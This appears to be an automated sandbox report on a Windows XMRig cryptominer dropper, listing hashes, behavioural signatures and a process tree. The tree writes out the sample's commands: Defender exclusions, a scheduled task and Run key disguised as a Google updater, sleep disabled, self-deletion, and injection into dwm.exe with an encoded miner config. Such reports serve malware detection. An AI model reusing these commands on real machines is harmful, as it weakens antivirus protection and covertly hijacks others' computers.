Analysis
-
max time kernel
152s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
15/06/2023, 21:14
Static task
static1
General
-
Target
e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe
-
Size
2.0MB
-
MD5
863359773158308ac17b5340a3b76242
-
SHA1
8bbb4206827d73f08ef39f84db68f47f81f8d776
-
SHA256
e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9
-
SHA512
2feef58ceb9878fb157287003ee5ef3bd48b1f5e52018862c12df6b70737d3cada80a01a7bdf9444b4800b48170b0d326dcc4b39ee0a507de56e4edd64c36eb5
-
SSDEEP
49152:OoGin4osB4YAvR0hvKg3oNG/lgLVqwBmBSnwyCKJmmBp6e:OViXv+hvKmoBBmBktCZmBpR
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 992 created 3108 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 20 PID 992 created 3108 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 20 PID 992 created 3108 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 20 PID 992 created 3108 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 20 PID 992 created 3108 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 20 PID 4728 created 3108 4728 updater.exe 20 PID 4728 created 3108 4728 updater.exe 20 PID 4728 created 3108 4728 updater.exe 20 PID 1456 created 3108 1456 conhost.exe 20 PID 4728 created 3108 4728 updater.exe 20 PID 4728 created 3108 4728 updater.exe 20 -
XMRig Miner payload 15 IoCs
resource yara_rule behavioral1/memory/484-210-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-213-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-214-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-216-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-218-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-220-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-222-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-224-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-226-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-228-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-233-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-235-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-237-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-239-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig behavioral1/memory/484-241-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 4728 updater.exe -
resource yara_rule behavioral1/memory/484-210-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-213-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-214-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-216-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-218-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-220-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-222-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-224-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-226-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-228-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-233-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-235-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-237-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-239-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx behavioral1/memory/484-241-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp upx -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4728 set thread context of 1456 4728 updater.exe 115 PID 4728 set thread context of 484 4728 updater.exe 121 -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3696 WMIC.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 1508 powershell.exe 1508 powershell.exe 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 3932 powershell.exe 3932 powershell.exe 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 992 e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe 3796 powershell.exe 3796 powershell.exe 4728 updater.exe 4728 updater.exe 4124 powershell.exe 4124 powershell.exe 4728 updater.exe 4728 updater.exe 4728 updater.exe 4728 updater.exe 2964 powershell.exe 2964 powershell.exe 4728 updater.exe 4728 updater.exe 1456 conhost.exe 1456 conhost.exe 4728 updater.exe 4728 updater.exe 4728 updater.exe 4728 updater.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1508 powershell.exe Token: SeShutdownPrivilege 2984 powercfg.exe Token: SeCreatePagefilePrivilege 2984 powercfg.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeShutdownPrivilege 4888 powercfg.exe Token: SeCreatePagefilePrivilege 4888 powercfg.exe Token: SeShutdownPrivilege 2268 powercfg.exe Token: SeCreatePagefilePrivilege 2268 powercfg.exe Token: SeShutdownPrivilege 3904 powercfg.exe Token: SeCreatePagefilePrivilege 3904 powercfg.exe Token: SeIncreaseQuotaPrivilege 3932 powershell.exe Token: SeSecurityPrivilege 3932 powershell.exe Token: SeTakeOwnershipPrivilege 3932 powershell.exe Token: SeLoadDriverPrivilege 3932 powershell.exe Token: SeSystemProfilePrivilege 3932 powershell.exe Token: SeSystemtimePrivilege 3932 powershell.exe Token: SeProfSingleProcessPrivilege 3932 powershell.exe Token: SeIncBasePriorityPrivilege 3932 powershell.exe Token: SeCreatePagefilePrivilege 3932 powershell.exe Token: SeBackupPrivilege 3932 powershell.exe Token: SeRestorePrivilege 3932 powershell.exe Token: SeShutdownPrivilege 3932 powershell.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeSystemEnvironmentPrivilege 3932 powershell.exe Token: SeRemoteShutdownPrivilege 3932 powershell.exe Token: SeUndockPrivilege 3932 powershell.exe Token: SeManageVolumePrivilege 3932 powershell.exe Token: 33 3932 powershell.exe Token: 34 3932 powershell.exe Token: 35 3932 powershell.exe Token: 36 3932 powershell.exe Token: SeIncreaseQuotaPrivilege 3932 powershell.exe Token: SeSecurityPrivilege 3932 powershell.exe Token: SeTakeOwnershipPrivilege 3932 powershell.exe Token: SeLoadDriverPrivilege 3932 powershell.exe Token: SeSystemProfilePrivilege 3932 powershell.exe Token: SeSystemtimePrivilege 3932 powershell.exe Token: SeProfSingleProcessPrivilege 3932 powershell.exe Token: SeIncBasePriorityPrivilege 3932 powershell.exe Token: SeCreatePagefilePrivilege 3932 powershell.exe Token: SeBackupPrivilege 3932 powershell.exe Token: SeRestorePrivilege 3932 powershell.exe Token: SeShutdownPrivilege 3932 powershell.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeSystemEnvironmentPrivilege 3932 powershell.exe Token: SeRemoteShutdownPrivilege 3932 powershell.exe Token: SeUndockPrivilege 3932 powershell.exe Token: SeManageVolumePrivilege 3932 powershell.exe Token: 33 3932 powershell.exe Token: 34 3932 powershell.exe Token: 35 3932 powershell.exe Token: 36 3932 powershell.exe Token: SeIncreaseQuotaPrivilege 3932 powershell.exe Token: SeSecurityPrivilege 3932 powershell.exe Token: SeTakeOwnershipPrivilege 3932 powershell.exe Token: SeLoadDriverPrivilege 3932 powershell.exe Token: SeSystemProfilePrivilege 3932 powershell.exe Token: SeSystemtimePrivilege 3932 powershell.exe Token: SeProfSingleProcessPrivilege 3932 powershell.exe Token: SeIncBasePriorityPrivilege 3932 powershell.exe Token: SeCreatePagefilePrivilege 3932 powershell.exe Token: SeBackupPrivilege 3932 powershell.exe Token: SeRestorePrivilege 3932 powershell.exe Token: SeShutdownPrivilege 3932 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe 484 dwm.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1884 wrote to memory of 2984 1884 cmd.exe 91 PID 1884 wrote to memory of 2984 1884 cmd.exe 91 PID 1884 wrote to memory of 4888 1884 cmd.exe 92 PID 1884 wrote to memory of 4888 1884 cmd.exe 92 PID 1884 wrote to memory of 2268 1884 cmd.exe 93 PID 1884 wrote to memory of 2268 1884 cmd.exe 93 PID 1884 wrote to memory of 3904 1884 cmd.exe 94 PID 1884 wrote to memory of 3904 1884 cmd.exe 94 PID 1008 wrote to memory of 4856 1008 cmd.exe 99 PID 1008 wrote to memory of 4856 1008 cmd.exe 99 PID 3796 wrote to memory of 3308 3796 powershell.exe 100 PID 3796 wrote to memory of 3308 3796 powershell.exe 100 PID 1380 wrote to memory of 1016 1380 cmd.exe 110 PID 1380 wrote to memory of 1016 1380 cmd.exe 110 PID 1380 wrote to memory of 5116 1380 cmd.exe 111 PID 1380 wrote to memory of 5116 1380 cmd.exe 111 PID 1380 wrote to memory of 5044 1380 cmd.exe 112 PID 1380 wrote to memory of 5044 1380 cmd.exe 112 PID 1380 wrote to memory of 3156 1380 cmd.exe 113 PID 1380 wrote to memory of 3156 1380 cmd.exe 113 PID 4728 wrote to memory of 1456 4728 updater.exe 115 PID 852 wrote to memory of 3696 852 cmd.exe 118 PID 852 wrote to memory of 3696 852 cmd.exe 118 PID 4728 wrote to memory of 484 4728 updater.exe 121 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3108
-
C:\Users\Admin\AppData\Local\Temp\e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe"C:\Users\Admin\AppData\Local\Temp\e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vjqnjk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ltnbmgzgd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:3308
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4856
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4124
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:1016
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:5116
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:5044
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3156
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zzwbkoalj2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1456
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
PID:3696
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵PID:1344
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe lqeflxzifadqmuiy 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnasCD7XnRLS04n/3PSQs4Y85pmzOipQFuVedLVimePMfz/K1iQprAF3Hsvc/5yykSYYXg1bCOF8/AROgrh0WbFuFrWaQ9W9CJXkaVyr3aPAjuRevGeTTOgQtV8DuLjw7FojiDBLBBUHzuyM6TUKXaA9jE5g6imTobgJY0GmGoYYzvGSXyp1ILlMl4XWxPURoBa87mEwLu44ElDwEHUz6Wfp1VnId7JgylfWjHxHC2L0sbgK37TwAUkxAeUF5EmGSYWPoc/hoOSXmLuZtiCKilw6RSw/8MPEm2oHyKYbioXceSLcBjYvoSfPuoXd4VLfsaruq1u3kozEP/1Ycvm+34XfL7uoDWEXj0af9QwU+8fCYIG1uSiRTxa7uWNm6/XTZ4oiOhtH2VQgDRS7Acu0vf6MTphkEnElFBHvPb/K3oCgw2cIAQvsXVRQfRKx8NP6GkIQoxU4MHmRCrQuoL+4HCkuF7SipHKgCTx9cND9kw/CZXWiY6yW95oyY0WkVgvBCmzD4qkzehmEVsBiRdQMS/G0etK36jDOJiwaB4FUe2xGPPFCdyEjVyr4P3MGqTpYMzRk4gkmwYo7JQoM0MYKz94u2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:484
-
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vjqnjk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2964
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD596b7303b3c5d43ea97d4ead95821a029
SHA1ea1ecce72a776cd922b090f28e9d5aaca1b27539
SHA2567e6faa0a80301b4dae2c6d499e68ad269378909cdd2dca17e972ff80d296b40f
SHA512edc84e846ca527e28702bf981482af921d7872af10aad705b4a527921f68bd06ce38d28c6254f4197f4985297500fcecc51a9f3051915345cd2cd474e0dcd288
-
Filesize
1KB
MD5107795dbca35eddccee7f563aa948b02
SHA1ffd0fbfafd48a022fc19d676728da99f70694183
SHA2563fd87f6a8a12c560d127e5f8dbb91e4592e6e08febe1d675db7fd5dba26d251c
SHA512a69f459cb0cdd2d28bdf9bfcb5f1b33801a3f4915e04b27fe6e65f6fc4cb8ab36a381f2fa93be388c6bd96f2b54fc98a3ab6ac517e3f86f50c7bfc4568d6b29c
-
Filesize
1KB
MD56c4805e00673bef922d51b1a7137028f
SHA10eabb38482d1733dd85a2af9c5342c2cafcd41eb
SHA2567af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd
SHA512eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1
-
Filesize
944B
MD511c29e3619cc1375abc369ed7e65d431
SHA19f9846c32fbbe87a7e77907d3f25b7ee06ff6e3d
SHA25698d26b2206fe042c7dac6cfab5286a3e24bceb684521952941442ac8577afd6a
SHA51214b07c366970b876d2b37e9e3375e8f4ac216c7d8be2e5eda8a81ff51d06acfd23125fddee60e1d10f0d47028335fff050370def109315b3e2cbde8b0125d7aa
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.0MB
MD5863359773158308ac17b5340a3b76242
SHA18bbb4206827d73f08ef39f84db68f47f81f8d776
SHA256e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9
SHA5122feef58ceb9878fb157287003ee5ef3bd48b1f5e52018862c12df6b70737d3cada80a01a7bdf9444b4800b48170b0d326dcc4b39ee0a507de56e4edd64c36eb5
-
Filesize
2.0MB
MD5863359773158308ac17b5340a3b76242
SHA18bbb4206827d73f08ef39f84db68f47f81f8d776
SHA256e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9
SHA5122feef58ceb9878fb157287003ee5ef3bd48b1f5e52018862c12df6b70737d3cada80a01a7bdf9444b4800b48170b0d326dcc4b39ee0a507de56e4edd64c36eb5
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29